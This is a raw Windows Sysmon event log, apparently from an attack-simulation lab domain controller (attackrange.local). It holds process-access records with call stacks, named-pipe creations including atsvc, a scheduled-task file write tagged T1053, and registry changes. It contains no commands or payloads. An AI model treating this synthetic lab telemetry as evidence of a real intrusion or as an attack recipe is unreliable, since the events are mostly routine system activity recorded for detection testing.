09:20:00.920{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052792Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.920{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052791Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.920{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052790Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.920{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052789Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.920{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052788Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.920{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052787Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.920{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052786Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.920{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052785Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.904{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052784Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.904{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052783Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.904{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x80000000000000001052782Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:00.904{5EBD8912-8CC0-6151-1600-00000000FD01}1296\Winsock2\CatalogChangeListener-510-0C:\Windows\system32\svchost.exe 17141700x80000000000000001052781Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:00.904{5EBD8912-8CC0-6151-1600-00000000FD01}1296\SessEnvPublicRpcC:\Windows\system32\svchost.exe 11241100x80000000000000001052780Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT10532021-09-27 09:20:00.842{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exeC:\Windows\Tasks\SA.DAT2016-09-12 11:34:03.403 17141700x80000000000000001052779Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:00.842{5EBD8912-8CC0-6151-1600-00000000FD01}1296\atsvcC:\Windows\system32\svchost.exe 10341000x80000000000000001052778Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.842{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052777Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.842{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052776Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.842{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052775Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.842{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052774Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.795{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052773Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.795{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052772Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.795{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001052771Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.779{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 13241300x80000000000000001052770Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.779{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\srvnet\Parameters\MajorSequenceDWORD (0x000001fd) 17141700x80000000000000001052769Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:00.764{5EBD8912-8CBD-6151-0B00-00000000FD01}640\Winsock2\CatalogChangeListener-280-1C:\Windows\system32\lsass.exe 17141700x80000000000000001052768Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:00.764{5EBD8912-8CBD-6151-0B00-00000000FD01}640\Winsock2\CatalogChangeListener-280-0C:\Windows\system32\lsass.exe 10341000x80000000000000001052767Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.748{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CA0-6151-0100-00000000FD01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052766Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.748{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CA0-6151-0100-00000000FD01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x80000000000000001052765Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.748{5EBD8912-8CA0-6151-0100-00000000FD01}4SystemHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 13241300x80000000000000001052764Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:20:00.748{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x80000000000000001052763Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.748{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052762Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:00.748{5EBD8912-8CBD-6151-0B00-00000000FD01}640840C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052761Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 